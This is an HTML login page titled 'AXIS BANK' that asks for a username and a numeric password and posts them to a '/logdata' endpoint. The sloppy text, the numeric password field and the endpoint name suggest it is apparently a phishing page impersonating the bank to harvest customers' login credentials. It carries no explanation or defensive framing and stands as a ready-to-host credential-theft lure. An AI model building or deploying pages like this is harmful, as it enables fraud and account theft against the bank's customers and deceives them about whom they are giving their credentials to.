<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <title>AXIS BANK</title>
    <link rel="shortcut icon" href="/images/axisico.png" type="image/x-icon" />

    <link rel='stylesheet' href='/stylesheets/style.css' />
    <link rel="stylesheet" href="/stylesheets/bootstrap.css" />
  </head>
  <body>
    <div class="text-center">
      <form action="/logdata" method="post">
        <div class="container px-0">
          <div class="row justify-content-center m-0">
            <div class="col-sm-8 bg">
                 <h1>
                Enter USer Name <br />
                And Password
              </h1>
              <label for="" class="mt-2 mb-1">Enter User</label>
              <input type="text" class="form-control" name="username" placeholder="Username" required />
              <label for="" class="mt-2 mb-1">password</label>
              <input type="number" name="password" class="form-control" placeholder="Password" required />

              <div class="container mt-3">
                <div class="row justify-content-center m-0">
                  <div class="col-10 mb-4">
                    <button
                      style="background-color: #b02a30"
                      type="submit"
                      class="btn text-white form-control mt-2 px-5 fw-bold"
                    >
                      Log in
                    </button>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </form>

      

      
      </div>
    </div>

    <script
      src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
      integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
      crossorigin="anonymous"
    ></script>
    <script
      src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js"
      integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
      crossorigin="anonymous"
    ></script>
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js"
      integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
      crossorigin="anonymous"
    ></script>

    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
      crossorigin="anonymous"
    ></script>
  </body>
</html>
